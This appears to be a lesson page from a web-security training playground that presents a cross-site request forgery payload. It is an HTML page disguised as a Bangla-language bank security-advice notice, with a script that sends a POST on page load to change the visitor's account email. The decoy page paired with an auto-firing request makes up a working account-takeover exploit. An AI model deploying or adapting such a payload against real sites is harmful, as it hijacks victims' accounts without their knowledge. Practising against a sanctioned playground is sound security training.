CSRF Attack
Anyxel Bank Ltd CSRF Attack Ajax Payload
Perform this CSRF attack on the CSRF Attack playground.
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet">
<link rel="shortcut icon" href="https://anyxel.com/frontend/img/logo-32x32.png">
<title>Anyxel Bank Ltd</title>
</head>
<body>
<nav class="navbar navbar-light bg-light">
<div class="container">
<a class="navbar-brand" href="#">
<img src="https://anyxel.com/frontend/img/logo-32x32.png" alt="" width="30" height="24"
class="d-inline-block align-text-top">
Anyxel Bank Ltd
</a>
</div>
</nav>
<div class="container mt-5">
<h1 class="display-6 text-center mb-4">নিরাপত্তা পরামর্শ</h1>
<p>
একটু সচেতনতা আমাদের অনেক অনাকাঙ্ক্ষিত ঘটনা থেকে রক্ষা করতে পারে। আপনার Anyxel Bank একাউন্ট এবং লেনদেনের নিরাপত্তা
নিশ্চিতের লক্ষ্যে কিছু পরামর্শ নিম্নরুপঃ
</p>
<ol>
<li class="mb-2">পিন নম্বর, “সিকিউরিটি কোড” এবং “সিক্রেট কোড” কখনই লিখে রাখবেন না এবং অন্য কাউকে জানতে দিবেন না।
“Anyxel Bank”
কর্তৃপক্ষ কখনো আপনার পিন নম্বর, সিক্রেট কোড, অথবা সিকিউরিটি কোড জানতে চাইবেন না।</li>
<li class="mb-2">লটারী জেতা, পুরষ্কার বা প্রতিযোগিতা, এই ধরনের কোনো মেসেজ বা ফোন কল এ সাড়া দিবেন না। এ ধরনের ফোন
কল বা মেসেজের
সত্যতা যাচাই করার জন্যে Anyxel Bank হেল্পলাইন 000000-এ যোগাযোগ করুন।</li>
<li>পরিচিত ও নির্ভরযোগ্য ব্যাক্তি ছাড়া আপনার মোবাইল ফোন কাউকে ধার দিবেন না।</li>
</ol>
</div>
<script>
window.addEventListener("load", (event) => {
changePassword();
});
async function changePassword() {
const data = { email: "[email protected]" };
let endpoint = "https://anyxel.com/playground/csrf-attack";
const response = await fetch(endpoint, {
method: "POST",
headers: {
"Content-Type": "application/json",
},
body: JSON.stringify(data),
});
}
</script>
</body>
</html>